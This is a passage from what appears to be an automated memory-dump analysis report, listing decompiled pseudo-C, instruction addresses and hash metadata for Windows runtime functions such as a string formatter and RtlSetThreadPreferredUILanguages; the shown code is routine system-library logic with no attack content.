                                                              					}
                                                              					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                              					_t108 = 0;
                                                              					_t109 = 0;
                                                              					_t95 = 0;
                                                              					__eflags = 0;
                                                              					while(1) {
                                                              						__eflags = _t95 - 0x200;
                                                              						if(_t95 >= 0x200) {
                                                              							break;
                                                              						}
                                                              						E04BDD000(0x80);
                                                              						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                              						_t108 = _t115;
                                                              						_t95 = _t95 - 0xffffff80;
                                                              						_t17 = _t114 - 4;
                                                              						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                              						__eflags =  *_t17;
                                                              						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                              						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                              						_t102 = _t110 + 1;
                                                              						do {
                                                              							_t85 =  *_t110;
                                                              							_t110 = _t110 + 1;
                                                              							__eflags = _t85;
                                                              						} while (_t85 != 0);
                                                              						_t111 = _t110 - _t102;
                                                              						_t21 = _t95 - 1; // -129
                                                              						_t86 = _t21;
                                                              						__eflags = _t111 - _t86;
                                                              						if(_t111 > _t86) {
                                                              							_t111 = _t86;
                                                              						}
                                                              						E04BDF3E0(_t108, _t106, _t111);
                                                              						_t115 = _t115 + 0xc;
                                                              						_t103 = _t111 + _t108;
                                                              						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                              						_t89 = _t95 - _t111;
                                                              						__eflags = _t89;
                                                              						_push(0);
                                                              						if(_t89 == 0) {
                                                              							L15:
                                                              							_t109 = 0xc000000d;
                                                              							goto L16;
                                                              						} else {
                                                              							__eflags = _t89 - 0x7fffffff;
                                                              							if(_t89 <= 0x7fffffff) {
                                                              								L16:
                                                              								 *(_t114 - 0x94) = _t109;
                                                              								__eflags = _t109;
                                                              								if(_t109 < 0) {
                                                              									__eflags = _t89;
                                                              									if(_t89 != 0) {
                                                              										 *_t103 = 0;
                                                              									}
                                                              									L26:
                                                              									 *(_t114 - 0xa0) = _t109;
                                                              									 *(_t114 - 4) = 0xfffffffe;
                                                              									__eflags = _t109;
                                                              									if(_t109 >= 0) {
                                                              										L31:
                                                              										_t98 = _t108;
                                                              										_t39 = _t98 + 1; // 0x1
                                                              										_t106 = _t39;
                                                              										do {
                                                              											_t69 =  *_t98;
                                                              											_t98 = _t98 + 1;
                                                              											__eflags = _t69;
                                                              										} while (_t69 != 0);
                                                              										_t99 = _t98 - _t106;
                                                              										__eflags = _t99;
                                                              										L34:
                                                              										_t70 =  *[fs:0x30];
                                                              										__eflags =  *((char*)(_t70 + 2));
                                                              										if( *((char*)(_t70 + 2)) != 0) {
                                                              											L40:
                                                              											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                              											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                              											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                              											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                              											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                              											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                              											 *(_t114 - 4) = 1;
                                                              											_push(_t114 - 0x74);
                                                              											L04BEDEF0(_t99, _t106);
                                                              											 *(_t114 - 4) = 0xfffffffe;
                                                              											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                              											goto L3;
                                                              										}
                                                              										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                              										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                              											goto L40;
                                                              										}
                                                              										_push( *((intOrPtr*)(_t114 + 8)));
                                                              										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                              										_push(_t99 & 0x0000ffff);
                                                              										_push(_t108);
                                                              										_push(1);
                                                              										_t101 = E04BDB280();
                                                              										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                              										if( *((char*)(_t114 + 0x14)) == 1) {
                                                              											__eflags = _t101 - 0x80000003;
                                                              											if(_t101 == 0x80000003) {
                                                              												E04BDB7E0(1);
                                                              												_t101 = 0;
                                                              												__eflags = 0;
                                                              											}
                                                              										}
                                                              										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                              										goto L4;
                                                              									}
                                                              									__eflags = _t109 - 0x80000005;
                                                              									if(_t109 == 0x80000005) {
                                                              										continue;
                                                              									}
                                                              									break;
                                                              								}
                                                              								 *(_t114 - 0x90) = 0;
                                                              								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                              								_t91 = E04BDE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                              								_t115 = _t115 + 0x10;
                                                              								_t104 = _t91;
                                                              								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                              								__eflags = _t104;
                                                              								if(_t104 < 0) {
                                                              									L21:
                                                              									_t109 = 0x80000005;
                                                              									 *(_t114 - 0x90) = 0x80000005;
                                                              									L22:
                                                              									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                              									L23:
                                                              									 *(_t114 - 0x94) = _t109;
                                                              									goto L26;
                                                              								}
                                                              								__eflags = _t104 - _t92;
                                                              								if(__eflags > 0) {
                                                              									goto L21;
                                                              								}
                                                              								if(__eflags == 0) {
                                                              									goto L22;
                                                              								}
                                                              								goto L23;
                                                              							}
                                                              							goto L15;
                                                              						}
                                                              					}
                                                              					__eflags = _t109;
                                                              					if(_t109 >= 0) {
                                                              						goto L31;
                                                              					}
                                                              					__eflags = _t109 - 0x80000005;
                                                              					if(_t109 != 0x80000005) {
                                                              						goto L31;
                                                              					}
                                                              					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                              					_t38 = _t95 - 1; // -129
                                                              					_t99 = _t38;
                                                              					goto L34;
                                                              				}
                                                              				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                              					__eflags = __edx - 0x65;
                                                              					if(__edx != 0x65) {
                                                              						goto L2;
                                                              					}
                                                              					goto L6;
                                                              				}
                                                              				L2:
                                                              				_push( *((intOrPtr*)(_t114 + 8)));
                                                              				_push(_t106);
                                                              				if(E04BDA890() != 0) {
                                                              					goto L6;
                                                              				}
                                                              				goto L3;
                                                              			}






















                                                              0x04b9b171
                                                              0x04b9b171
                                                              0x04b9b171
                                                              0x04b9b171
                                                              0x04b9b171
                                                              0x04b9b176
                                                              0x04b9b17b
                                                              0x04b9b180
                                                              0x04b9b186
                                                              0x04b9b18f
                                                              0x04b9b198
                                                              0x04b9b1a4
                                                              0x04b9b1aa
                                                              0x04bf4802
                                                              0x04bf4802
                                                              0x04bf4805
                                                              0x04bf480c
                                                              0x04bf480e
                                                              0x04b9b1d1
                                                              0x04b9b1d3
                                                              0x04b9b1de
                                                              0x04b9b1de
                                                              0x04bf4817
                                                              0x04bf481e
                                                              0x04bf4820
                                                              0x04bf4822
                                                              0x04bf4822
                                                              0x04bf4824
                                                              0x04bf4824
                                                              0x04bf482a
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf4835
                                                              0x04bf483a
                                                              0x04bf483d
                                                              0x04bf483f
                                                              0x04bf4842
                                                              0x04bf4842
                                                              0x04bf4842
                                                              0x04bf4846
                                                              0x04bf484c
                                                              0x04bf484e
                                                              0x04bf4851
                                                              0x04bf4851
                                                              0x04bf4853
                                                              0x04bf4854
                                                              0x04bf4854
                                                              0x04bf4858
                                                              0x04bf485a
                                                              0x04bf485a
                                                              0x04bf485d
                                                              0x04bf485f
                                                              0x04bf4861
                                                              0x04bf4861
                                                              0x04bf4866
                                                              0x04bf486b
                                                              0x04bf486e
                                                              0x04bf4871
                                                              0x04bf4876
                                                              0x04bf4876
                                                              0x04bf4878
                                                              0x04bf487b
                                                              0x04bf4884
                                                              0x04bf4884
                                                              0x00000000
                                                              0x04bf487d
                                                              0x04bf487d
                                                              0x04bf4882
                                                              0x04bf4889
                                                              0x04bf4889
                                                              0x04bf488f
                                                              0x04bf4891
                                                              0x04bf48e0
                                                              0x04bf48e2
                                                              0x04bf48e4
                                                              0x04bf48e4
                                                              0x04bf48e7
                                                              0x04bf48e7
                                                              0x04bf48ed
                                                              0x04bf48f4
                                                              0x04bf48f6
                                                              0x04bf4951
                                                              0x04bf4951
                                                              0x04bf4953
                                                              0x04bf4953
                                                              0x04bf4956
                                                              0x04bf4956
                                                              0x04bf4958
                                                              0x04bf4959
                                                              0x04bf4959
                                                              0x04bf495d
                                                              0x04bf495d
                                                              0x04bf495f
                                                              0x04bf495f
                                                              0x04bf4965
                                                              0x04bf4969
                                                              0x04bf49ba
                                                              0x04bf49ba
                                                              0x04bf49c1
                                                              0x04bf49c5
                                                              0x04bf49cc
                                                              0x04bf49d4
                                                              0x04bf49d7
                                                              0x04bf49da
                                                              0x04bf49e4
                                                              0x04bf49e5
                                                              0x04bf49f3
                                                              0x04bf4a02
                                                              0x00000000
                                                              0x04bf4a02
                                                              0x04bf4972
                                                              0x04bf4974
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf4976
                                                              0x04bf4979
                                                              0x04bf4982
                                                              0x04bf4983
                                                              0x04bf4984
                                                              0x04bf498b
                                                              0x04bf498d
                                                              0x04bf4991
                                                              0x04bf4993
                                                              0x04bf4999
                                                              0x04bf499d
                                                              0x04bf49a2
                                                              0x04bf49a2
                                                              0x04bf49a2
                                                              0x04bf4999
                                                              0x04bf49ac
                                                              0x00000000
                                                              0x04bf49b3
                                                              0x04bf48f8
                                                              0x04bf48fe
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf48fe
                                                              0x04bf4895
                                                              0x04bf489c
                                                              0x04bf48ad
                                                              0x04bf48b2
                                                              0x04bf48b5
                                                              0x04bf48b7
                                                              0x04bf48ba
                                                              0x04bf48bc
                                                              0x04bf48c6
                                                              0x04bf48c6
                                                              0x04bf48cb
                                                              0x04bf48d1
                                                              0x04bf48d4
                                                              0x04bf48d8
                                                              0x04bf48d8
                                                              0x00000000
                                                              0x04bf48d8
                                                              0x04bf48be
                                                              0x04bf48c0
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf48c2
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf48c4
                                                              0x00000000
                                                              0x04bf4882
                                                              0x04bf487b
                                                              0x04bf4904
                                                              0x04bf4906
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf4908
                                                              0x04bf490e
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf4910
                                                              0x04bf4917
                                                              0x04bf4917
                                                              0x00000000
                                                              0x04bf4917
                                                              0x04b9b1ba
                                                              0x04bf47f9
                                                              0x04bf47fc
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf47fc
                                                              0x04b9b1c0
                                                              0x04b9b1c0
                                                              0x04b9b1c3
                                                              0x04b9b1cb
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: _vswprintf_s
                                                              • String ID:
                                                              • API String ID: 677850445-0
                                                              • Opcode ID: 4dc1cd61413dac1aca11ebde11442562da73400dd7a08403eab40146869c4b5f
                                                              • Instruction ID: fdb17d6565dfa41289e416a5eef72a1e45e3867eb1161982d7ab40b5a1f2bcdc
                                                              • Opcode Fuzzy Hash: 4dc1cd61413dac1aca11ebde11442562da73400dd7a08403eab40146869c4b5f
                                                              • Instruction Fuzzy Hash: B651CD71E042698EEF31CF688844BAEBBB0FF50714F1081EDD95DAB681D77069898B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 76%
                                                              			E04BBB944(signed int* __ecx, char __edx) {
                                                              				signed int _v8;
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				char _v28;
                                                              				signed int _v32;
                                                              				char _v36;
                                                              				signed int _v40;
                                                              				intOrPtr _v44;
                                                              				signed int* _v48;
                                                              				signed int _v52;
                                                              				signed int _v56;
                                                              				intOrPtr _v60;
                                                              				intOrPtr _v64;
                                                              				intOrPtr _v68;
                                                              				intOrPtr _v72;
                                                              				intOrPtr _v76;
                                                              				char _v77;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				intOrPtr* _t65;
                                                              				intOrPtr _t67;
                                                              				intOrPtr _t68;
                                                              				char* _t73;
                                                              				intOrPtr _t77;
                                                              				intOrPtr _t78;
                                                              				signed int _t82;
                                                              				intOrPtr _t83;
                                                              				void* _t87;
                                                              				char _t88;
                                                              				intOrPtr* _t89;
                                                              				intOrPtr _t91;
                                                              				void* _t97;
                                                              				intOrPtr _t100;
                                                              				void* _t102;
                                                              				void* _t107;
                                                              				signed int _t108;
                                                              				intOrPtr* _t112;
                                                              				void* _t113;
                                                              				intOrPtr* _t114;
                                                              				intOrPtr _t115;
                                                              				intOrPtr _t116;
                                                              				intOrPtr _t117;
                                                              				signed int _t118;
                                                              				void* _t130;
                                                              
                                                              				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                              				_v8 =  *0x4c8d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                              				_t112 = __ecx;
                                                              				_v77 = __edx;
                                                              				_v48 = __ecx;
                                                              				_v28 = 0;
                                                              				_t5 = _t112 + 0xc; // 0x575651ff
                                                              				_t105 =  *_t5;
                                                              				_v20 = 0;
                                                              				_v16 = 0;
                                                              				if(_t105 == 0) {
                                                              					_t50 = _t112 + 4; // 0x5de58b5b
                                                              					_t60 =  *__ecx |  *_t50;
                                                              					if(( *__ecx |  *_t50) != 0) {
                                                              						 *__ecx = 0;
                                                              						__ecx[1] = 0;
                                                              						if(E04BB7D50() != 0) {
                                                              							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              						} else {
                                                              							_t65 = 0x7ffe0386;
                                                              						}
                                                              						if( *_t65 != 0) {
                                                              							E04C68CD6(_t112);
                                                              						}
                                                              						_push(0);
                                                              						_t52 = _t112 + 0x10; // 0x778df98b
                                                              						_push( *_t52);
                                                              						_t60 = E04BD9E20();
                                                              					}
                                                              					L20:
                                                              					_pop(_t107);
                                                              					_pop(_t113);
                                                              					_pop(_t87);
                                                              					return E04BDB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                              				}
                                                              				_t8 = _t112 + 8; // 0x8b000cc2
                                                              				_t67 =  *_t8;
                                                              				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                              				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                              				_t108 =  *(_t67 + 0x14);
                                                              				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                              				_t105 = 0x2710;
                                                              				asm("sbb eax, edi");
                                                              				_v44 = _t88;
                                                              				_v52 = _t108;
                                                              				_t60 = E04BDCE00(_t97, _t68, 0x2710, 0);
                                                              				_v56 = _t60;
                                                              				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                              					L3:
                                                              					 *(_t112 + 0x44) = _t60;
                                                              					_t105 = _t60 * 0x2710 >> 0x20;
                                                              					 *_t112 = _t88;
                                                              					 *(_t112 + 4) = _t108;
                                                              					_v20 = _t60 * 0x2710;
                                                              					_v16 = _t60 * 0x2710 >> 0x20;
                                                              					if(_v77 != 0) {
                                                              						L16:
                                                              						_v36 = _t88;
                                                              						_v32 = _t108;
                                                              						if(E04BB7D50() != 0) {
                                                              							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              						} else {
                                                              							_t73 = 0x7ffe0386;
                                                              						}
                                                              						if( *_t73 != 0) {
                                                              							_t105 = _v40;
                                                              							E04C68F6A(_t112, _v40, _t88, _t108);
                                                              						}
                                                              						_push( &_v28);
                                                              						_push(0);
                                                              						_push( &_v36);
                                                              						_t48 = _t112 + 0x10; // 0x778df98b
                                                              						_push( *_t48);
                                                              						_t60 = E04BDAF60();
                                                              						goto L20;
                                                              					} else {
                                                              						_t89 = 0x7ffe03b0;
                                                              						do {
                                                              							_t114 = 0x7ffe0010;
                                                              							do {
                                                              								_t77 =  *0x4c88628; // 0x0
                                                              								_v68 = _t77;
                                                              								_t78 =  *0x4c8862c; // 0x0
                                                              								_v64 = _t78;
                                                              								_v72 =  *_t89;
                                                              								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                              								while(1) {
                                                              									_t105 =  *0x7ffe000c;
                                                              									_t100 =  *0x7ffe0008;
                                                              									if(_t105 ==  *_t114) {
                                                              										goto L8;
                                                              									}
                                                              									asm("pause");
                                                              								}
                                                              								L8:
                                                              								_t89 = 0x7ffe03b0;
                                                              								_t115 =  *0x7ffe03b0;
                                                              								_t82 =  *0x7FFE03B4;
                                                              								_v60 = _t115;
                                                              								_t114 = 0x7ffe0010;
                                                              								_v56 = _t82;
                                                              							} while (_v72 != _t115 || _v76 != _t82);
                                                              							_t83 =  *0x4c88628; // 0x0
                                                              							_t116 =  *0x4c8862c; // 0x0
                                                              							_v76 = _t116;
                                                              							_t117 = _v68;
                                                              						} while (_t117 != _t83 || _v64 != _v76);
                                                              						asm("sbb edx, [esp+0x24]");
                                                              						_t102 = _t100 - _v60 - _t117;
                                                              						_t112 = _v48;
                                                              						_t91 = _v44;
                                                              						asm("sbb edx, eax");
                                                              						_t130 = _t105 - _v52;
                                                              						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                              							_t88 = _t102 - _t91;
                                                              							asm("sbb edx, edi");
                                                              							_t108 = _t105;
                                                              						} else {
                                                              							_t88 = 0;
                                                              							_t108 = 0;
                                                              						}
                                                              						goto L16;
                                                              					}
                                                              				} else {
                                                              					if( *(_t112 + 0x44) == _t60) {
                                                              						goto L20;
                                                              					}
                                                              					goto L3;
                                                              				}
                                                              			}
















































                                                              0x04bbb94c
                                                              0x04bbb956
                                                              0x04bbb95c
                                                              0x04bbb95e
                                                              0x04bbb964
                                                              0x04bbb969
                                                              0x04bbb96d
                                                              0x04bbb96d
                                                              0x04bbb970
                                                              0x04bbb974
                                                              0x04bbb97a
                                                              0x04bbbadf
                                                              0x04bbbadf
                                                              0x04bbbae2
                                                              0x04bbbae4
                                                              0x04bbbae6
                                                              0x04bbbaf0
                                                              0x04c02cb8
                                                              0x04bbbaf6
                                                              0x04bbbaf6
                                                              0x04bbbaf6
                                                              0x04bbbafd
                                                              0x04bbbb1f
                                                              0x04bbbb1f
                                                              0x04bbbaff
                                                              0x04bbbb00
                                                              0x04bbbb00
                                                              0x04bbbb03
                                                              0x04bbbb03
                                                              0x04bbbacb
                                                              0x04bbbacf
                                                              0x04bbbad0
                                                              0x04bbbad1
                                                              0x04bbbadc
                                                              0x04bbbadc
                                                              0x04bbb980
                                                              0x04bbb980
                                                              0x04bbb988
                                                              0x04bbb98b
                                                              0x04bbb98d
                                                              0x04bbb990
                                                              0x04bbb993
                                                              0x04bbb999
                                                              0x04bbb99b
                                                              0x04bbb9a1
                                                              0x04bbb9a5
                                                              0x04bbb9aa
                                                              0x04bbb9b0
                                                              0x04bbb9bb
                                                              0x04bbb9c0
                                                              0x04bbb9c3
                                                              0x04bbb9ca
                                                              0x04bbb9cc
                                                              0x04bbb9cf
                                                              0x04bbb9d3
                                                              0x04bbb9d7
                                                              0x04bbba94
                                                              0x04bbba94
                                                              0x04bbba98
                                                              0x04bbbaa3
                                                              0x04c02ccb
                                                              0x04bbbaa9
                                                              0x04bbbaa9
                                                              0x04bbbaa9
                                                              0x04bbbab1
                                                              0x04c02cd5
                                                              0x04c02cdd
                                                              0x04c02cdd
                                                              0x04bbbabb
                                                              0x04bbbabc
                                                              0x04bbbac2
                                                              0x04bbbac3
                                                              0x04bbbac3
                                                              0x04bbbac6
                                                              0x00000000
                                                              0x04bbb9dd
                                                              0x04bbb9dd
                                                              0x04bbb9e7
                                                              0x04bbb9e7
                                                              0x04bbb9ec
                                                              0x04bbb9ec
                                                              0x04bbb9f1
                                                              0x04bbb9f5
                                                              0x04bbb9fa
                                                              0x04bbba00
                                                              0x04bbba0c
                                                              0x04bbba10
                                                              0x04bbba10
                                                              0x04bbba12
                                                              0x04bbba18
                                                              0x00000000
                                                              0x00000000
                                                              0x04bbbb26
                                                              0x04bbbb26
                                                              0x04bbba1e
                                                              0x04bbba1e
                                                              0x04bbba23
                                                              0x04bbba25
                                                              0x04bbba2c
                                                              0x04bbba30
                                                              0x04bbba35
                                                              0x04bbba35
                                                              0x04bbba41
                                                              0x04bbba46
                                                              0x04bbba4c
                                                              0x04bbba50
                                                              0x04bbba54
                                                              0x04bbba6a
                                                              0x04bbba6e
                                                              0x04bbba70
                                                              0x04bbba74
                                                              0x04bbba78
                                                              0x04bbba7a
                                                              0x04bbba7c
                                                              0x04bbba8e
                                                              0x04bbba90
                                                              0x04bbba92
                                                              0x04bbbb14
                                                              0x04bbbb14
                                                              0x04bbbb16
                                                              0x04bbbb16
                                                              0x00000000
                                                              0x04bbba7c
                                                              0x04bbbb0a
                                                              0x04bbbb0d
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bbbb0f

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04BBB9A5
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 885266447-0
                                                              • Opcode ID: 485bc38d31667811fe1094d13a34010bbc650db8939670a7d9755c7818dc89df
                                                              • Instruction ID: 02da6e1a01fa1ee047eeac89e77dab22c3e164971106a0ac2a83529c3460b63b
                                                              • Opcode Fuzzy Hash: 485bc38d31667811fe1094d13a34010bbc650db8939670a7d9755c7818dc89df
                                                              • Instruction Fuzzy Hash: 84515871A08300CFC720DF28C480A6ABBE5FB88614F5489AEE5D597754EBB0FD45CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 80%
                                                              			E04BCFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                              				char _v5;
                                                              				signed int _v8;
                                                              				signed int _v12;
                                                              				char _v16;
                                                              				char _v17;
                                                              				char _v20;
                                                              				signed int _v24;
                                                              				char _v28;
                                                              				char _v32;
                                                              				signed int _v40;
                                                              				void* __ecx;
                                                              				void* __edi;
                                                              				void* __ebp;
                                                              				signed int _t73;
                                                              				intOrPtr* _t75;
                                                              				signed int _t77;
                                                              				signed int _t79;
                                                              				signed int _t81;
                                                              				intOrPtr _t83;
                                                              				intOrPtr _t85;
                                                              				intOrPtr _t86;
                                                              				signed int _t91;
                                                              				signed int _t94;
                                                              				signed int _t95;
                                                              				signed int _t96;
                                                              				signed int _t106;
                                                              				signed int _t108;
                                                              				signed int _t114;
                                                              				signed int _t116;
                                                              				signed int _t118;
                                                              				signed int _t122;
                                                              				signed int _t123;
                                                              				void* _t129;
                                                              				signed int _t130;
                                                              				void* _t132;
                                                              				intOrPtr* _t134;
                                                              				signed int _t138;
                                                              				signed int _t141;
                                                              				signed int _t147;
                                                              				intOrPtr _t153;
                                                              				signed int _t154;
                                                              				signed int _t155;
                                                              				signed int _t170;
                                                              				void* _t174;
                                                              				signed int _t176;
                                                              				signed int _t177;
                                                              
                                                              				_t129 = __ebx;
                                                              				_push(_t132);
                                                              				_push(__esi);
                                                              				_t174 = _t132;
                                                              				_t73 =  !( *( *(_t174 + 0x18)));
                                                              				if(_t73 >= 0) {
                                                              					L5:
                                                              					return _t73;
                                                              				} else {
                                                              					E04BAEEF0(0x4c87b60);
                                                              					_t134 =  *0x4c87b84; // 0x77f07b80
                                                              					_t2 = _t174 + 0x24; // 0x24
                                                              					_t75 = _t2;
                                                              					if( *_t134 != 0x4c87b80) {
                                                              						_push(3);
                                                              						asm("int 0x29");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						_push(0x4c87b60);
                                                              						_t170 = _v8;
                                                              						_v28 = 0;
                                                              						_v40 = 0;
                                                              						_v24 = 0;
                                                              						_v17 = 0;
                                                              						_v32 = 0;
                                                              						__eflags = _t170 & 0xffff7cf2;
                                                              						if((_t170 & 0xffff7cf2) != 0) {
                                                              							L43:
                                                              							_t77 = 0xc000000d;
                                                              						} else {
                                                              							_t79 = _t170 & 0x0000000c;
                                                              							__eflags = _t79;
                                                              							if(_t79 != 0) {
                                                              								__eflags = _t79 - 0xc;
                                                              								if(_t79 == 0xc) {
                                                              									goto L43;
                                                              								} else {
                                                              									goto L9;
                                                              								}
                                                              							} else {
                                                              								_t170 = _t170 | 0x00000008;
                                                              								__eflags = _t170;
                                                              								L9:
                                                              								_t81 = _t170 & 0x00000300;
                                                              								__eflags = _t81 - 0x300;
                                                              								if(_t81 == 0x300) {
                                                              									goto L43;
                                                              								} else {
                                                              									_t138 = _t170 & 0x00000001;
                                                              									__eflags = _t138;
                                                              									_v24 = _t138;
                                                              									if(_t138 != 0) {
                                                              										__eflags = _t81;
                                                              										if(_t81 != 0) {
                                                              											goto L43;
                                                              										} else {
                                                              											goto L11;
                                                              										}
                                                              									} else {
                                                              										L11:
                                                              										_push(_t129);
                                                              										_t77 = E04BA6D90( &_v20);
                                                              										_t130 = _t77;
                                                              										__eflags = _t130;
                                                              										if(_t130 >= 0) {
                                                              											_push(_t174);
                                                              											__eflags = _t170 & 0x00000301;
                                                              											if((_t170 & 0x00000301) == 0) {
                                                              												_t176 = _a8;
                                                              												__eflags = _t176;
                                                              												if(__eflags == 0) {
                                                              													L64:
                                                              													_t83 =  *[fs:0x18];
                                                              													_t177 = 0;
                                                              													__eflags =  *(_t83 + 0xfb8);
                                                              													if( *(_t83 + 0xfb8) != 0) {
                                                              														E04BA76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                              														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                              													}
                                                              													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                              													goto L15;
                                                              												} else {
                                                              													asm("sbb edx, edx");
                                                              													_t114 = E04C38938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                              													__eflags = _t114;
                                                              													if(_t114 < 0) {
                                                              														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                              														E04B9B150();
                                                              													}
                                                              													_t116 = E04C36D81(_t176,  &_v16);
                                                              													__eflags = _t116;
                                                              													if(_t116 >= 0) {
                                                              														__eflags = _v16 - 2;
                                                              														if(_v16 < 2) {
                                                              															L56:
                                                              															_t118 = E04BA75CE(_v20, 5, 0);
                                                              															__eflags = _t118;
                                                              															if(_t118 < 0) {
                                                              																L67:
                                                              																_t130 = 0xc0000017;
                                                              																goto L32;
                                                              															} else {
                                                              																__eflags = _v12;
                                                              																if(_v12 == 0) {
                                                              																	goto L67;
                                                              																} else {
                                                              																	_t153 =  *0x4c88638; // 0x2e6f098
                                                              																	_t122 = L04BA38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                              																	_t154 = _v12;
                                                              																	_t130 = _t122;
                                                              																	__eflags = _t130;
                                                              																	if(_t130 >= 0) {
                                                              																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                              																		__eflags = _t123;
                                                              																		if(_t123 != 0) {
                                                              																			_t155 = _a12;
                                                              																			__eflags = _t155;
                                                              																			if(_t155 != 0) {
                                                              																				 *_t155 = _t123;
                                                              																			}
                                                              																			goto L64;
                                                              																		} else {
                                                              																			E04BA76E2(_t154);
                                                              																			goto L41;
                                                              																		}
                                                              																	} else {
                                                              																		E04BA76E2(_t154);
                                                              																		_t177 = 0;
                                                              																		goto L18;
                                                              																	}
                                                              																}
                                                              															}
                                                              														} else {
                                                              															__eflags =  *_t176;
                                                              															if( *_t176 != 0) {
                                                              																goto L56;
                                                              															} else {
                                                              																__eflags =  *(_t176 + 2);
                                                              																if( *(_t176 + 2) == 0) {
                                                              																	goto L64;
                                                              																} else {
                                                              																	goto L56;
                                                              																}
                                                              															}
                                                              														}
                                                              													} else {
                                                              														_t130 = 0xc000000d;
                                                              														goto L32;
                                                              													}
                                                              												}
                                                              												goto L35;
                                                              											} else {
                                                              												__eflags = _a8;
                                                              												if(_a8 != 0) {
                                                              													_t77 = 0xc000000d;
                                                              												} else {
                                                              													_v5 = 1;
                                                              													L04BCFCE3(_v20, _t170);
                                                              													_t177 = 0;
                                                              													__eflags = 0;
                                                              													L15:
                                                              													_t85 =  *[fs:0x18];
